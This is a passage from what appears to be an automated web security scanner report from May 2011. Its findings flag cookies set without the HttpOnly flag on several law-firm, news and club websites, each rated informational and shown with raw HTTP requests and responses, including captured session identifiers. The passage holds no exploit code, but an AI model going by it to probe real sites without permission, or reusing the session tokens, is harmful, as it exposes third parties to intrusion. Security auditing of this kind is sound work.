Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f
Cookie: exp_last_visit=1305221465; exp_last_activity=1305236919; __utma=175020734.1039693598.1305202900.1305216575.1305218923.3; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734; __utmb=175020734.1.10.1305218923

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:57:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305237457; expires=Fri, 11-May-2012 16:57:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fpractice_areas%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:57:37 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Practice Areas | Moritt Hoc
...[SNIP]...
18.142. http://www.nytimes.com/2007/02/09/business/09legal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2007/02/09/business/09legal.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2007/02/09/business/09legal.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:56:02 GMT
Set-cookie: RMID=8a5a625a144d4dcc11228918; expires=Friday, 11-May-2012 16:56:02 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 61572


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nytimes.com/js/c
...[SNIP]...
18.143. http://www.nytimes.com/2009/01/13/business/13bail.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/01/13/business/13bail.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2009/01/13/business/13bail.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:59 GMT
Set-cookie: RMID=d8ee86371f324dcc111f8854; expires=Friday, 11-May-2012 16:55:59 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*2635d=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 68967


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.ny
...[SNIP]...
18.144. http://www.nytimes.com/2009/06/19/business/19scrushy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2009/06/19/business/19scrushy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2009/06/19/business/19scrushy.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:58 GMT
Set-cookie: RMID=8a5a625a144d4dcc111e8902; expires=Friday, 11-May-2012 16:55:58 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=-; path=/; domain=.nytimes.com
Set-cookie: adxcs=s*192f3=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-type: text/html
Content-Length: 65875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<script src="http://graphics8.nyt
...[SNIP]...
18.145. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nytimes.com
Path:   /2010/08/22/sports/cycling/22armstrong.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2010/08/22/sports/cycling/22armstrong.html HTTP/1.1
Host: www.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Thu, 12 May 2011 16:55:57 GMT
Set-cookie: RMID=fa2f606568f14dcc111a74bd; expires=Friday, 11-May-2012 16:55:54 GMT; path=/; domain=.nytimes.com
Content-type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/
...[SNIP]...
18.146. http://www.orangecountyala.org/clubportal/memlogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/memlogin.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clubportal/memlogin.cfm?clubID=809 HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A12%3A06%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D3%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23;expires=Sat, 04-May-2041 18:12:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
18.147. http://www.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Perkins+Coie&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:01 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1089; path=/
Set-Cookie: PortletId=1901; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bhdcqa45wofgyj55yavek255; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 62469
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/
Content-Length: 62469


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Co
...[SNIP]...
18.148. http://www.perkinscoie.com/AdvancedSearch.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /AdvancedSearch.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdvancedSearch.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:57:30 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1089; path=/
Set-Cookie: PortletId=1901; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Advanced Sea
...[SNIP]...
18.149. http://www.perkinscoie.com/FCWSite/abc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /FCWSite/abc.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FCWSite/abc.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:58:16 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Length: 75065
content-disposition: inline; filename=abc.pdf
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Expires: Thu, 12 May 2011 16:57:59 GMT
Content-Type: application/pdf

%PDF-1.2

3 0 obj
<<
/E 74833
/H [ 1392 203 ]
/L 75065
/Linearized 1
/N 1
/O 6
/T 74955
>>
endobj

xref
3 27
00000
...[SNIP]...
18.150. http://www.perkinscoie.com/events/eventslist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /events/eventslist.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events/eventslist.aspx?Upcoming=true HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/mquehrn/
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:56 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1173; path=/
Set-Cookie: PortletId=1873101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 69542
Content-Length: 69542


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Co
...[SNIP]...
18.151. http://www.perkinscoie.com/firm/firm.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /firm/firm.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /firm/firm.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:53 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1175; path=/
Set-Cookie: PortletId=1875101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Perkins Coie
...[SNIP]...
18.152. http://www.perkinscoie.com/mquehrn/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /mquehrn/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mquehrn/ HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.perkinscoie.com/professionals/professionals_results.aspx?LastName=Q
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1091; PortletId=2301; SiteId=1088; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; ZoneId=8; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; __utmc=49731751; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; __utmb=49731751

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:46:33 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1091; path=/
Set-Cookie: PortletId=2301; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 60797
Content-Length: 60797


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3
...[SNIP]...
18.153. http://www.perkinscoie.com/news/news_detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /news/news_detail.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/news_detail.aspx HTTP/1.1
Host: www.perkinscoie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=1873101; SERVER_PORT=80; __utmz=49731751.1305216548.1.1.utmccn=(organic)|utmcsr=google|utmctr=Perkins+Coie|utmcmd=organic; NavId=1173; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=8; Mode=1; NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660; DefaultCulture=en-US; __utma=49731751.2135652298.1305216548.1305216548.1305218767.2; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=49731751; __utmb=49731751; ASP.NET_SessionId=nespk155di5f0yekjngznv55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=8&RootPortletName=ConnectWebRoot&RootPortletNavID=1087&RootPortletID=666&RootPortletH4AssetID=1501&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1088;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:54 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1174; path=/
Set-Cookie: PortletId=1874101; path=/
Set-Cookie: SiteId=1088; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=8; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26936


<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3
...[SNIP]...
18.154. http://www.perkinscoie.com/professionals/professionals.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.perkinscoie.com
Path:   /professionals/professionals.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /professionals/professionals.aspx HTTP/1.1
Host: www.perkinscoie.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
